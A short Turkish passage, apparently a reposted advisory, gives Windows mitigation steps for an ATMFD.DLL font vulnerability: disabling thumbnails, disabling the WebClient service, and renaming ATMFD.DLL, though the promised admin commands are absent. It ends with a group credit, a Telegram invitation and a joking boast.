Gelişmiş ayarlar altında, Simgeleri her zaman göster, asla küçük resimler kutusunu işaretleyin.
Değişikliğin etkili olması için Windows Gezgini'nin tüm açık sekmelerini kapatın.

WebClient hizmetini devre dışı bırakın.

Bunun yanı sıra, WebDAV istemci hizmeti aracılığıyla siber saldırıları önlemek için Windows WebClient hizmetini devre dışı bırakmanız önerilir.

Başlat'ı tıklatın, Çalıştır'ı tıklatın (veya klavyede Windows Tuşu ve R tuşuna basın), Services.msc yazın ve Tamam'ı tıklayın.
WebClient hizmetini sağ tıklatın ve Özellikler'i seçin.
Başlangıç türünü Devre Dışı olarak değiştirin. Hizmet çalışıyorsa, Durdur'u tıklatın.
Tamam'a tıklayın ve yönetim uygulamasından çıkın.

ATMFD.DLL dosyasını yeniden adlandırın veya devre dışı bırakın.

Yönetici komut istemine aşağıdaki komutları girin ;

Sistemi yeniden başlatınız.

@ykslkrkci tarafından Persona Non Grata için hazırlanmıştır . Telegram grubumuza katılın.

Amirim inanın Türkiyenin yetiştirdiği ender yetenekleriz biz, Polis gecesine de çıktık.